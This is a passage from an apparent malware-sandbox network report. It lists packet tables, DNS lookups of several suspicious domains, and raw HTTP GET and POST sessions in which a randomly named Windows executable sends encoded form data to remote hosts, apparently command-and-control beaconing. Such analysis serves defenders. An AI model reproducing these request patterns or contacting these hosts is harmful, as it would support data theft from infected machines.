                                                Jan 10, 2025 23:41:39.293921947 CET8061137172.96.191.39192.168.2.11
                                                Jan 10, 2025 23:41:40.204065084 CET8061137172.96.191.39192.168.2.11
                                                Jan 10, 2025 23:41:40.204323053 CET8061137172.96.191.39192.168.2.11
                                                Jan 10, 2025 23:41:40.204391956 CET6113780192.168.2.11172.96.191.39
                                                Jan 10, 2025 23:41:40.207710028 CET6113780192.168.2.11172.96.191.39
                                                Jan 10, 2025 23:41:40.212554932 CET8061137172.96.191.39192.168.2.11
                                                Jan 10, 2025 23:41:55.304615021 CET6113880192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:55.309549093 CET8061138217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:55.309650898 CET6113880192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:55.323663950 CET6113880192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:55.328469038 CET8061138217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:55.972693920 CET8061138217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:55.972740889 CET8061138217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:55.972794056 CET6113880192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:56.831060886 CET6113880192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:57.849877119 CET6113980192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:57.854751110 CET8061139217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:57.854830027 CET6113980192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:57.869261026 CET6113980192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:57.874155045 CET8061139217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:58.527141094 CET8061139217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:58.527242899 CET8061139217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:41:58.527321100 CET6113980192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:41:59.379749060 CET6113980192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:00.402555943 CET6114080192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:00.407494068 CET8061140217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:00.407582998 CET6114080192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:00.475157976 CET6114080192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:00.480127096 CET8061140217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:00.480149984 CET8061140217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:01.069921970 CET8061140217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:01.069972992 CET8061140217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:01.070116997 CET6114080192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:01.987353086 CET6114080192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.056633949 CET6114180192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.061609030 CET8061141217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:03.061709881 CET6114180192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.089250088 CET6114180192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.094177008 CET8061141217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:03.714968920 CET8061141217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:03.715827942 CET8061141217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:03.718483925 CET6114180192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.719455957 CET6114180192.168.2.11217.160.0.183
                                                Jan 10, 2025 23:42:03.724245071 CET8061141217.160.0.183192.168.2.11
                                                Jan 10, 2025 23:42:08.775628090 CET6114280192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:08.780518055 CET806114284.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:08.780626059 CET6114280192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:08.795057058 CET6114280192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:08.799880981 CET806114284.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:09.264780045 CET806114284.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:09.264885902 CET6114280192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:10.299798965 CET6114280192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:10.304721117 CET806114284.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:11.323831081 CET6114380192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:11.328732967 CET806114384.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:11.328824043 CET6114380192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:11.343384981 CET6114380192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:11.348197937 CET806114384.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:11.812921047 CET806114384.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:11.813055992 CET6114380192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:12.846878052 CET6114380192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:12.851632118 CET806114384.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:13.871676922 CET6114480192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:13.876621008 CET806114484.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:13.876749039 CET6114480192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:13.892664909 CET6114480192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:13.897700071 CET806114484.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:13.897798061 CET806114484.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:14.351550102 CET806114484.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:14.354372978 CET6114480192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:15.409293890 CET6114480192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:15.414314985 CET806114484.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.429006100 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.433748007 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.433826923 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.443977118 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.448745966 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904479980 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904510021 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904520988 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904531956 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904542923 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904552937 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904567957 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904650927 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.904654980 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904665947 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904678106 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904681921 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.904690027 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:16.904699087 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.904714108 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.904743910 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:16.998841047 CET6114580192.168.2.1184.32.84.32
                                                Jan 10, 2025 23:42:17.003660917 CET806114584.32.84.32192.168.2.11
                                                Jan 10, 2025 23:42:22.045089960 CET6114680192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:22.051405907 CET8061146209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:22.051482916 CET6114680192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:22.065982103 CET6114680192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:22.070847034 CET8061146209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:22.695534945 CET8061146209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:22.695647955 CET8061146209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:22.695708990 CET6114680192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:23.582072020 CET6114680192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:24.599915981 CET6114780192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:24.604789972 CET8061147209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:24.604881048 CET6114780192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:24.619458914 CET6114780192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:24.624346972 CET8061147209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:25.226042032 CET8061147209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:25.226068974 CET8061147209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:25.226145029 CET6114780192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:26.127991915 CET6114780192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:27.146648884 CET6114880192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:27.152103901 CET8061148209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:27.152220964 CET6114880192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:27.166804075 CET6114880192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:27.171749115 CET8061148209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:27.171863079 CET8061148209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:27.739665031 CET8061148209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:27.739860058 CET8061148209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:27.739929914 CET6114880192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:28.679928064 CET6114880192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:29.693691015 CET6114980192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:29.698518038 CET8061149209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:29.698620081 CET6114980192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:29.707653046 CET6114980192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:29.712485075 CET8061149209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:30.308140039 CET8061149209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:30.308188915 CET8061149209.74.79.42192.168.2.11
                                                Jan 10, 2025 23:42:30.308315039 CET6114980192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:30.311019897 CET6114980192.168.2.11209.74.79.42
                                                Jan 10, 2025 23:42:30.315866947 CET8061149209.74.79.42192.168.2.11

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 23:40:55.072067976 CET5350716162.159.36.2192.168.2.11
                                                Jan 10, 2025 23:40:55.540977955 CET6405353192.168.2.111.1.1.1
                                                Jan 10, 2025 23:40:55.547823906 CET53640531.1.1.1192.168.2.11
                                                Jan 10, 2025 23:41:39.001837015 CET6024153192.168.2.111.1.1.1
                                                Jan 10, 2025 23:41:39.265964031 CET53602411.1.1.1192.168.2.11
                                                Jan 10, 2025 23:41:55.256480932 CET5607053192.168.2.111.1.1.1
                                                Jan 10, 2025 23:41:55.302128077 CET53560701.1.1.1192.168.2.11
                                                Jan 10, 2025 23:42:08.725251913 CET6356853192.168.2.111.1.1.1
                                                Jan 10, 2025 23:42:08.772128105 CET53635681.1.1.1192.168.2.11
                                                Jan 10, 2025 23:42:22.006550074 CET5544853192.168.2.111.1.1.1
                                                Jan 10, 2025 23:42:22.042727947 CET53554481.1.1.1192.168.2.11

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 10, 2025 23:40:55.540977955 CET192.168.2.111.1.1.10x31d8Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                Jan 10, 2025 23:41:39.001837015 CET192.168.2.111.1.1.10x55b4Standard query (0)www.88rtp.bizA (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:41:55.256480932 CET192.168.2.111.1.1.10x515Standard query (0)www.kubex.devA (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:42:08.725251913 CET192.168.2.111.1.1.10x5c2dStandard query (0)www.sido247.proA (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:42:22.006550074 CET192.168.2.111.1.1.10xde26Standard query (0)www.glowups.lifeA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 10, 2025 23:40:22.428607941 CET1.1.1.1192.168.2.110x846dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 23:40:22.428607941 CET1.1.1.1192.168.2.110x846dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:40:55.547823906 CET1.1.1.1192.168.2.110x31d8Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                Jan 10, 2025 23:41:39.265964031 CET1.1.1.1192.168.2.110x55b4No error (0)www.88rtp.biz88rtp.bizCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 23:41:39.265964031 CET1.1.1.1192.168.2.110x55b4No error (0)88rtp.biz172.96.191.39A (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:41:55.302128077 CET1.1.1.1192.168.2.110x515No error (0)www.kubex.dev217.160.0.183A (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:42:08.772128105 CET1.1.1.1192.168.2.110x5c2dNo error (0)www.sido247.prosido247.proCNAME (Canonical name)IN (0x0001)false
                                                Jan 10, 2025 23:42:08.772128105 CET1.1.1.1192.168.2.110x5c2dNo error (0)sido247.pro84.32.84.32A (IP address)IN (0x0001)false
                                                Jan 10, 2025 23:42:22.042727947 CET1.1.1.1192.168.2.110xde26No error (0)www.glowups.life209.74.79.42A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.88rtp.biz
                                                • www.kubex.dev
                                                • www.sido247.pro
                                                • www.glowups.life

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.1161137172.96.191.39806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:41:39.289041042 CET407OUTGET /oz0e/?GF=mlOXG&IJQ=N0iBPOr2h1wf3hrnovRBb1Y/GOEfnc+lKlX+67l0LxDwIz/NET6JyzkCPnJBSBJZztg4pX1Iwr0Nd76JZuhGaj9BaNcemEVJE4if1Cf0Ux8WzxQbGzZtN58= HTTP/1.1
                                                Host: www.88rtp.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.5
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Jan 10, 2025 23:41:40.204065084 CET1033INHTTP/1.1 404 Not Found
                                                Connection: close
                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                pragma: no-cache
                                                content-type: text/html
                                                content-length: 796
                                                date: Fri, 10 Jan 2025 22:41:40 GMT
                                                server: LiteSpeed
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.1161138217.160.0.183806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:41:55.323663950 CET668OUTPOST /o5mm/ HTTP/1.1
                                                Host: www.kubex.dev
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.kubex.dev
                                                Referer: http://www.kubex.dev/o5mm/
                                                Content-Length: 200
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 52 39 45 73 36 49 49 47 6e 30 6e 72 57 5a 4a 74 70 33 42 62 37 58 6b 69 62 64 39 5a 68 79 64 47 6b 79 66 71 51 69 53 6b 73 67 4e 4f 69 41 6b 77 31 58 53 54 2f 42 41 49 34 49 42 67 4e 31 49 58 34 70 52 51 34 38 74 6a 46 62 6a 30 57 4d 6c 2f 59 64 2b 6e 30 48 72 32 77 6b 45 34 70 35 48 2f 47 45 50 67 4d 69 6b 74 62 4c 63 56 46 54 4b 6e 4b 6b 6b 74 61 76 72 65 64 71 4a 74 43 44 39 47 6d 59 4d 7a 57 73 74 65 5a 36 47 39 67 37 2b 47 2f 4e 6d 74 33 51 6a 68 4e 54 2f 43 64 48 46 73 42 46 2f 51 61 32 72 58 4b 71 78 37 42 4d 44 50 6b 53 6d 4f 45 67 3d 3d
                                                Data Ascii: IJQ=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3QjhNT/CdHFsBF/Qa2rXKqx7BMDPkSmOEg==
                                                Jan 10, 2025 23:41:55.972693920 CET558INHTTP/1.1 404 Not Found
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Date: Fri, 10 Jan 2025 22:41:55 GMT
                                                Server: Apache
                                                Content-Encoding: gzip
                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.1161139217.160.0.183806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:41:57.869261026 CET688OUTPOST /o5mm/ HTTP/1.1
                                                Host: www.kubex.dev
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.kubex.dev
                                                Referer: http://www.kubex.dev/o5mm/
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                Data Raw: 49 4a 51 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 74 47 6b 54 76 71 57 54 53 6b 6c 77 4e 4f 73 67 6b 31 37 33 53 59 2f 42 38 2b 34 4a 39 67 4e 31 4d 58 34 6f 68 51 34 50 56 67 45 4c 6a 32 4f 38 6c 78 46 4e 2b 6e 30 48 72 32 77 6b 51 53 70 35 76 2f 47 56 66 67 50 44 6b 73 46 37 63 4b 55 54 4b 6e 62 55 6b 70 61 76 72 67 64 76 70 44 43 47 68 47 6d 5a 38 7a 57 34 5a 64 51 36 48 30 2f 72 2f 35 35 50 57 6c 78 79 4b 67 44 41 72 52 4b 48 42 75 4e 6a 79 4b 4b 56 69 41 4a 35 35 35 56 71 69 2f 74 6a 44 48 66 70 59 39 42 36 78 67 46 55 76 62 70 77 54 77 57 69 76 50 2b 70 34 3d
                                                Data Ascii: IJQ=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHtGkTvqWTSklwNOsgk173SY/B8+4J9gN1MX4ohQ4PVgELj2O8lxFN+n0Hr2wkQSp5v/GVfgPDksF7cKUTKnbUkpavrgdvpDCGhGmZ8zW4ZdQ6H0/r/55PWlxyKgDArRKHBuNjyKKViAJ555Vqi/tjDHfpY9B6xgFUvbpwTwWivP+p4=
                                                Jan 10, 2025 23:41:58.527141094 CET558INHTTP/1.1 404 Not Found
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Date: Fri, 10 Jan 2025 22:41:58 GMT
                                                Server: Apache
                                                Content-Encoding: gzip
                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.1161140217.160.0.183806364C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 10, 2025 23:42:00.475157976 CET1701OUTPOST /o5mm/ HTTP/1.1
                                                Host: www.kubex.dev
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.5
                                                Origin: http://www.kubex.dev
                                                Referer: http://www.kubex.dev/o5mm/
                                                Content-Length: 1232
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
